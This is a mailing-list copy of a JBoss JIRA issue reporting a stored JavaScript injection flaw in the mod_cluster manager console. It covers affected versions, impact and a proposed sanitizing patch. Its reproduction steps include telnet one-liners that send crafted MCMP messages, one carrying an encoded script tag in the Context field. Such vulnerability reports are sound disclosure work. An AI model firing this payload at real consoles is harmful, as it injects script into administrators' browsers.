[mod_cluster-issues] [JBoss JIRA] (MODCLUSTER-453) It is possible to inject JavaScript into mod_cluster manager console via MCMP messages

RH Bugzilla Integration (JIRA) issues at jboss.org
Tue Apr 12 03:40:00 EDT 2016 

    [ https://issues.jboss.org/browse/MODCLUSTER-453?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13190246#comment-13190246 ] 

RH Bugzilla Integration commented on MODCLUSTER-453:
----------------------------------------------------

baranowb <bbaranow at redhat.com> changed the Status of [bug 1326179|https://bugzilla.redhat.com/show_bug.cgi?id=1326179] from NEW to MODIFIED

> It is possible to inject JavaScript into mod_cluster manager console via MCMP messages
> --------------------------------------------------------------------------------------
>
>                 Key: MODCLUSTER-453
>                 URL: https://issues.jboss.org/browse/MODCLUSTER-453
>             Project: mod_cluster
>          Issue Type: Bug
>          Components: Native (httpd modules)
>    Affects Versions: 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
>            Reporter: Michal Karm Babacek
>            Assignee: Jean-Frederic Clere
>            Priority: Critical
>             Fix For: 1.3.2.Final, 1.2.12.Final
>
>         Attachments: MODCLUSTER-453_master-better_one.patch, MODCLUSTER-453_master-mbabacek.patch, MODCLUSTER-453_master-offensive_approach.patch, patch.new.best.patch, patch.new.txt, patch.txt
>
>
> This is a nasty one indeed :-)
> h3. Steps to reproduce
> * start Apache HTTP Server with mod_cluster
> * send these messages (provided you test instance listens on 127.0.0.1)
> {code}
> { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
> { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
> {code}
> * Open  http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being executed.
> h3. Impact
>  * Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come from could send these messages and execute arbitrary JavaScript code.
> h3. Suggestion
> * Leverage {{apr_escape*}} to sanitize MCMP messages.
> h3. Proposed patch
> * [^patch.new.best.patch]: MCMP messages containing suspicious characters are discarded.



--
This message was sent by Atlassian JIRA
(v6.4.11#64026)

More information about the mod_cluster-issues mailing list